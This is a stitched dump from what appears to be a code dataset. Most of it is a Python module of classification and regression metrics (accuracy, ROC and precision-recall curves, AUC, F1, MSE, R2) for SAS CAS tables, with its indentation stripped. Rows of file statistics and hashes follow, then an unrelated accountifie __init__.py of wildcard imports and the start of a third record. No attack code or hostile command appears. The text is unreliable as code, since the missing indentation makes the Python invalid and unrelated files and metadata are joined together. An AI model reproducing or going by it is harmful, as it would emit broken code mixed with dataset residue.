conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
if labels is None:
return conf_mat
else:
if not isinstance(labels, list):
labels = [labels]
return conf_mat.iloc[labels, labels]
def accuracy_score(y_true, y_pred, castable=None, normalize=True, id_vars=None):
'''
Computes the classification accuracy score.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted class labels. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
normalize : boolean, optional
If ``False``, return the number of correctly classified samples.
Otherwise, return the fraction of correctly classified samples.
Default = True
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None
Returns
-------
score : float
If ``normalize=False``, return the number of correctly classified samples.
Otherwise, return the fraction of correctly classified samples.
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
# use confusion_matrix to compute accuracy
conf_mat = confusion_matrix(y_true, y_pred, castable=castable, id_vars=id_vars)
# total number of observations
obs_per_class = conf_mat.sum()
tot_obs = sum(obs_per_class)
correct_pred_class = pd.Series(np.diag(conf_mat), index=[conf_mat.index, conf_mat.columns])
tot_correct_pred_obs = sum(correct_pred_class)
if normalize:
score = tot_correct_pred_obs/tot_obs
else:
score = tot_correct_pred_obs
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return score
def plot_roc(y_true, y_score, pos_label, castable=None, cutstep=0.001,
figsize=(8, 8), fontsize_spec=None, linewidth=1, id_vars=None):
'''
Plot the receiver operating characteristic (ROC) curve for binary classification
tasks.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_score has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_score has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
y_score : string or :class:`CASColumn`
The column of estimated probability for the positive class. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
pos_label : string, int or float
The positive class label.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_score and y_true are strings.
Default = None
cutstep : float > 0 and < 1, optional
The stepsize of threshold cutoffs.
Default=0.001.
figsize : tuple, optional
The size of the generated figure.
Default=(8, 8).
fontsize_spec : dict, optional
It specifies the fontsize for 'xlabel', 'ylabel', 'xtick', 'ytick'
and 'title'. (e.g. {'xlabel':14, 'ylabel':14}).
If None, it will take the default fontsize, which are
{'xlabel':16, 'ylabel':16, 'xtick':14, 'ytick':14, 'title':20}
Default=None.
linewidth : float, optional
It specify the line width for the ROC curve.
Default=1.
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_score if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_score appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
:class:`matplotlib.axes.Axes`
The x-axis is the false positive rate and the y-axis is the true positive rate.
'''
fontsize = {'xlabel':16, 'ylabel':16, 'xtick':14,
'ytick':14, 'title':20}
if fontsize_spec is not None:
fontsize.update(fontsize_spec)
if not isinstance(pos_label, str):
pos_label = str(pos_label)
check_results = _check_inputs(y_true, y_score, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_score = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
conn.retrieve('loadactionset', _messagelevel = 'error', actionset = 'percentile')
res = conn.retrieve('percentile.assess', _messagelevel = 'error',
table=castable,
inputs=y_score, response=y_true,
event=pos_label, cutstep=cutstep)
if tmp_table_created: # if tmp_tbl_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
rocinfo = res['ROCInfo']
fpr = list(rocinfo.FPR) + [0]
tpr = list(rocinfo.Sensitivity) + [0]
fig, ax = plt.subplots(1, 1, figsize=figsize)
ax.plot(fpr, tpr, linestyle='-', linewidth=linewidth)
ax.set_ylim([-0.01, 1.01])
ax.set_xlim([-0.01, 1.01])
ax.plot([0,1], [0,1], linestyle='--', linewidth=linewidth)
ax.set_xlabel('False Positive Rate', fontsize=fontsize['xlabel'])
ax.set_ylabel('True Positive Rate', fontsize=fontsize['ylabel'])
ax.get_xaxis().set_tick_params(direction='out', labelsize=fontsize['xtick'])
ax.get_yaxis().set_tick_params(direction='out', labelsize=fontsize['ytick'])
ax.set_title('ROC curve', fontsize=fontsize['title'])
return ax
def plot_precision_recall(y_true, y_score, pos_label, castable=None, cutstep=0.001,
figsize=(8, 8), fontsize_spec=None, linewidth=1, id_vars=None):
'''
Plot the precision recall(PR) curve for binary classification
tasks.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_score has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_score has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
y_score : string or :class:`CASColumn`
The column of estimated probability for the positive class. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
pos_label : string, int or float
The positive class label.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_score and y_true are strings.
Default = None
cutstep : float > 0 and < 1, optional
The stepsize of threshold cutoffs.
Default=0.001.
figsize : tuple, optional
The size of the generated figure.
Default=(8, 8).
fontsize_spec : dict, optional
It specifies the fontsize for 'xlabel', 'ylabel', 'xtick', 'ytick'
and 'title'. (e.g. {'xlabel':14, 'ylabel':14}).
If None, it will take the default fontsize, which are
{'xlabel':16, 'ylabel':16, 'xtick':14, 'ytick':14, 'title':20}
Default=None.
linewidth : float, optional
It specify the line width for the ROC curve.
Default=1.
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_score if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_score appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
:class:`matplotlib.axes.Axes`
The x-axis is the recall(sensitivity) and the y-axis is the precision.
'''
fontsize = {'xlabel':16, 'ylabel':16, 'xtick':14,
'ytick':14, 'title':20}
if fontsize_spec is not None:
fontsize.update(fontsize_spec)
if not isinstance(pos_label, str):
pos_label = str(pos_label)
check_results = _check_inputs(y_true, y_score, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_score = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
conn.retrieve('loadactionset', _messagelevel = 'error', actionset = 'percentile')
res = conn.retrieve('percentile.assess', _messagelevel = 'error',
table=castable,
inputs=y_score, response=y_true,
event=pos_label, cutstep=cutstep)
if tmp_table_created: # if tmp_tbl_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
rocinfo = res['ROCInfo']
rocinfo.loc[rocinfo.TP+ rocinfo.FP == 0, 'FDR'] = 0
fdr = list(rocinfo.FDR) + [0]
precision = [1-x for x in fdr]
recall = list(rocinfo.Sensitivity) + [0]
fig, ax = plt.subplots(1, 1, figsize=figsize)
ax.plot(recall, precision, linestyle='-', linewidth=linewidth)
ax.set_ylim([-0.01, 1.01])
ax.set_xlim([-0.01, 1.01])
ax.set_xlabel('Recall', fontsize=fontsize['xlabel'])
ax.set_ylabel('Precision', fontsize=fontsize['ylabel'])
ax.get_xaxis().set_tick_params(direction='out', labelsize=fontsize['xtick'])
ax.get_yaxis().set_tick_params(direction='out', labelsize=fontsize['ytick'])
ax.set_title('Precision-Recall curve', fontsize=fontsize['title'])
return ax
def roc_auc_score(y_true, y_score, pos_label, castable=None, cutstep=0.001, id_vars=None):
'''
Compute the area under the receiver operating characteristic (ROC) curve for binary classification
tasks.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_score has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_score has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
y_score : string or :class:`CASColumn`
The column of estimated probability for the positive class. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
pos_label : string, int or float
The positive class label.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_score and y_true are strings.
Default = None
cutstep : float > 0 and < 1, optional
The stepsize of threshold cutoffs.
Default=0.001.
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_score if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_score appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
score : float
'''
if not isinstance(pos_label, str):
pos_label = str(pos_label)
check_results = _check_inputs(y_true, y_score, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_score = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
conn.retrieve('loadactionset', _messagelevel = 'error', actionset = 'percentile')
res = conn.retrieve('percentile.assess', _messagelevel = 'error',
table=castable,
inputs=y_score, response=y_true,
event=pos_label, cutstep=cutstep)
if tmp_table_created: # if tmp_tbl_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
rocinfo = res['ROCInfo']
auc_score = rocinfo.C.loc[0]
return auc_score
def average_precision_score(y_true, y_score, pos_label, castable=None, cutstep=0.001,
interpolate=False, id_vars=None):
'''
Compute the average precision score for binary classification
tasks.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_score has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_score has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
y_score : string or :class:`CASColumn`
The column of estimated probability for the positive class. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_score
and y_true are :class:`CASColumn`, they can be in different CASTable.
pos_label : string, int or float
The positive class label.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_score and y_true are strings.
Default = None
cutstep : float > 0 and < 1, optional
The stepsize of threshold cutoffs.
Default=0.001.
interpolate : boolean, optional
If ``interpolate=True``, it is the area under the precision recall
curve with linear interpolation. Otherwise, it is defined as
https://scikit-learn.org/stable/modules/generated/sklearn.metrics.average_precision_score.html
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_score if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_score appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
score : float
'''
if not isinstance(pos_label, str):
pos_label = str(pos_label)
check_results = _check_inputs(y_true, y_score, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_score = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
conn.retrieve('loadactionset', _messagelevel = 'error', actionset = 'percentile')
res = conn.retrieve('percentile.assess', _messagelevel = 'error',
table=castable,
inputs=y_score, response=y_true,
event=pos_label, cutstep=cutstep)
if tmp_table_created: # if tmp_tbl_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
rocinfo = res['ROCInfo']
rocinfo.loc[rocinfo.TP+ rocinfo.FP == 0, 'FDR'] = 0
fdr = list(rocinfo.FDR) + [0]
precision = [1-x for x in fdr]
recall = list(rocinfo.Sensitivity) + [0]
if interpolate:
#Calculate the area under the PR curve using trapezoidal rule, with linear interpolation
ap = sum([np.mean(precision[i:i+2])*(recall[i]-recall[i+1])
for i in range(len(recall)-1)])
else:
#Use the formulation same as scikit-learn without linear interpolation.
#https://scikit-learn.org/stable/modules/generated/sklearn.metrics.average_precision_score.html
ap = sum([precision[i]*(recall[i]-recall[i+1])
for i in range(len(recall)-1)])
return ap
def f1_score(y_true, y_pred, pos_label, castable=None, id_vars=None):
'''
Compute the f1 score of the binary classification task. f1 score is defined as
:math:`\frac{2PR}{P+R}`, where :math:`P` is the precision and :math:`R` is
the recall.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted class labels. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
pos_label : string, int or float
The positive class label.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
score : float
'''
conf_mat = confusion_matrix(y_true, y_pred, castable=castable, id_vars=id_vars)
recall = conf_mat.iloc[pos_label, pos_label]/conf_mat.iloc[pos_label, :].sum()
precision = conf_mat.iloc[pos_label, pos_label]/conf_mat.iloc[:, pos_label].sum()
f1 = 2*precision*recall/(precision + recall)
return f1
def explained_variance_score(y_true, y_pred, castable=None, id_vars=None):
'''
Compute the explained variance score for a regression task. It is the
fraction of the target variable variance that is explained by the model.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth target values. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted target values. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
score : float
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
error_colname = 'err'
# check whether error_colname is already in the castable,
# to avoid duplication or overwrite when creating computedvars.
while error_colname in castable.columns:
error_colname = random_name(name='err_')
castbl_params = {}
castbl_params['computedvars'] = [{"name":error_colname}]
code = '{2}={0}-{1}'.format(y_true, y_pred, error_colname)
castbl_params['computedvarsprogram'] = code
castable = conn.CASTable(castable.name, **castbl_params)
total_var = castable[y_true].var()
err_var = castable[error_colname].var()
expl_var = 1 - err_var/total_var
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return expl_var
def mean_absolute_error(y_true, y_pred, castable=None, id_vars=None):
'''
Compute the mean absolute error of a regression task.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth target values. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted target values. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
loss : float
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
error_colname = 'abserr'
# check whether error_colname is already in the castable,
# to avoid duplication or overwrite when creating computedvars.
while error_colname in castable.columns:
error_colname = random_name(name='abserr_')
castbl_params = {}
castbl_params['computedvars'] = [{"name":error_colname}]
code = '{2}=abs({0}-{1})'.format(y_true, y_pred, error_colname)
castbl_params['computedvarsprogram'] = code
castable = conn.CASTable(castable.name, **castbl_params)
mae = castable[error_colname].mean()
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return mae
def mean_squared_error(y_true, y_pred, castable=None, id_vars=None):
'''
Compute the mean squared error of a regression task.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth target values. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted target values. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
loss : float
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
error_colname = 'err2'
# check whether error_colname is already in the castable,
# to avoid duplication or overwrite when creating computedvars.
while error_colname in castable.columns:
error_colname = random_name(name='err2_')
castbl_params = {}
castbl_params['computedvars'] = [{"name":error_colname}]
code = '{2}=({0}-{1})**2'.format(y_true, y_pred, error_colname)
castbl_params['computedvarsprogram'] = code
castable = conn.CASTable(castable.name, **castbl_params)
mse = castable[error_colname].mean()
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return mse
def mean_squared_log_error(y_true, y_pred, castable=None, id_vars=None):
'''
Compute the mean squared logarithmic error of the regression tasks.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth target values. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted target values. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
loss : float
'''
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
error_colname = 'logerr2'
# check whether error_colname is already in the castable,
# to avoid duplication or overwrite when creating computedvars.
while error_colname in castable.columns:
error_colname = random_name(name='logerr2_')
castbl_params = {}
castbl_params['computedvars'] = [{"name":error_colname}]
code = '{2}=(log(1+{0})-log(1+{1}))**2'.format(y_true, y_pred, error_colname)
castbl_params['computedvarsprogram'] = code
castable = conn.CASTable(castable.name, **castbl_params)
logerr2 = castable[error_colname].mean()
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return logerr2
def r2_score(y_true, y_pred, castable=None, id_vars=None):
'''
Compute the R^2 (coefficient of determination) regression score.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth target values. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted target values. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
loss : float
'''
mse = mean_squared_error(y_true, y_pred, castable=castable, id_vars=id_vars)
check_results = _check_inputs(y_true, y_pred, castable=castable,
return_target_dtype=False, id_vars=id_vars)
y_true = check_results[0]
y_pred = check_results[1]
castable = check_results[2]
conn = check_results[3]
tmp_table_created = check_results[4]
nobs = castable[[y_true, y_pred]].dropna().shape[0]
sse = nobs*mse
tss = castable[y_true].var()*(nobs-1)
r2 = 1- sse/tss
if tmp_table_created: # if tmp_table_created, tbl_name referes to the temporary table name
conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
return r2
def _check_inputs(y_true, y_pred, castable=None, return_target_dtype=False, id_vars=None):
'''
Check the input argument y_true, y_pred, and return their names if they are CASColumn.
If y_true, and y_pred is in the form of CASColumn and from different CASTables,
a temporary CASTable will be created which contains both columns.
Parameters
----------
y_true : string or :class:`CASColumn`
The column of the ground truth labels. If it is a string, then
y_pred has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
y_pred : string or :class:`CASColumn`
The column of the predicted class labels. If it is a string, then
y_true has to be a string and they both belongs to the same CASTable specified
by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
and y_true are :class:`CASColumn`, they can be in different CASTables.
castable : :class:`CASTable`, optional
The CASTable object to use as the source if the y_pred and y_true are strings.
Default = None
return_target_dtype : boolean, optional
If True, return the data type of y_true in the CASTable.
Default = False
id_vars : string or list of strings, optional
Column names that serve as unique id for y_true and y_pred if they are
from different CASTables. The column names need to appear in both CASTables,
and they serve to match y_true and y_pred appropriately, since observation
orders can be shuffled in distributed computing environment.
Default = None.
Returns
-------
y_true : string
The column name of the y_true column.
y_pred : string
The column name of the y_pred column.
castable : :class:`CASTable`
The original CASTable if y_true and y_pred are in the same castable. The
temporary table that contain both columns if y_true and y_pred is from
different CASTable.
conn : :class:`CAS`
The connection on the CASColumn or CASTable.
tmp_table_created : boolean
Whether a temporary CASTable is created to host y_true and y_pred.
target_dtype : string
The data type of y_true in the CASTable.
Only provided if `return_target_dtype` is True.
'''
tmp_table_created = False
if isinstance(y_pred, str) and isinstance(y_true, str):
if not isinstance(castable, CASTable):
raise ValueError('castable need to be a CASTable if y_true and y_pred are strings')
conn = castable.get_connection()
if return_target_dtype:
colinfo = castable.columninfo().ColumnInfo
target_dtype = colinfo.Type[colinfo.Column==y_true].values[0]
elif isinstance(y_pred, CASColumn) and isinstance(y_true, CASColumn):
conn = y_true.get_connection()
y_true_tblname = y_true.to_outtable_params()['name']
y_pred_tblname = y_pred.to_outtable_params()['name']
if return_target_dtype:
colinfo = y_true.columninfo().ColumnInfo
target_dtype = colinfo.Type[colinfo.Column==y_true.name].values[0]
y_true = y_true.name
y_pred = y_pred.name
if y_true_tblname != y_pred_tblname:
tmp_table_name = random_name('metric_tmp',6)
if id_vars is None:
warnings.warn('{} and {} are from different CASTables, '.format(y_true, y_pred) +
'and their appropriate matching may not be guaranteed '+
'unless id_vars argument is provided.')
sascode = '''
data {};
merge {}(keep={}) {}(keep={});
run;
'''.format(tmp_table_name, y_true_tblname, y_true, y_pred_tblname, y_pred)
conn.retrieve('dataStep.runCode', _messagelevel='error', code=sascode, single='Yes')
else:
if not isinstance(id_vars, list):
id_vars = [id_vars]
y_true_keep = ' '.join([y_true]+id_vars)
y_pred_keep = ' '.join([y_pred]+id_vars)
by_var = ' '.join(id_vars)
sascode = '''
data {};
merge {}(keep={}) {}(keep={});
by {};
run;
'''.format(tmp_table_name, y_true_tblname, y_true_keep, y_pred_tblname, y_pred_keep, by_var)
conn.retrieve('dataStep.runCode', _messagelevel='error', code=sascode)
castable = conn.CASTable(tmp_table_name)
tmp_table_created = True
else:
castable = conn.CASTable(y_true_tblname)
else:
raise ValueError('Input for ground truth and predicted value need to be the same type of either '+
'strings representing column names or CASColumns')
if return_target_dtype:
return (y_true, y_pred, castable, conn, tmp_table_created, target_dtype)
else:
return (y_true, y_pred, castable, conn, tmp_table_created)
| 43.954155
| 109
| 0.659583
| 6,505
| 46,020
| 4.522521
| 0.066872
| 0.032462
| 0.009178
| 0.012373
| 0.83045
| 0.814712
| 0.807845
| 0.798362
| 0.791937
| 0.78983
| 0
| 0.007555
| 0.2608
| 46,020
| 1,046
| 110
| 43.996176
| 0.857252
| 0.567579
| 0
| 0.580737
| 0
| 0
| 0.08811
| 0.001676
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036827
| false
| 0
| 0.025496
| 0
| 0.104816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e4049e44df387ce85d90ceaa44d0c0834dd32dc8
| 131
|
py
|
Python
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 4
|
2017-06-02T08:48:48.000Z
|
2021-11-21T23:57:15.000Z
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 3
|
2020-06-05T16:55:42.000Z
|
2021-06-10T17:43:12.000Z
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 4
|
2015-12-15T14:27:51.000Z
|
2017-04-21T21:42:27.000Z
|
from .everything import *
from .datefuncs import *
from .gl_helpers import *
from .tables import *
from .highchart_config import *
| 21.833333
| 31
| 0.770992
| 17
| 131
| 5.823529
| 0.529412
| 0.40404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152672
| 131
| 5
| 32
| 26.2
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c168b649002343fb46587d98b8d61c78fed885b
| 108
|
py
|
Python
|
lib/backbone/__init__.py
|
sx14/BBN
|
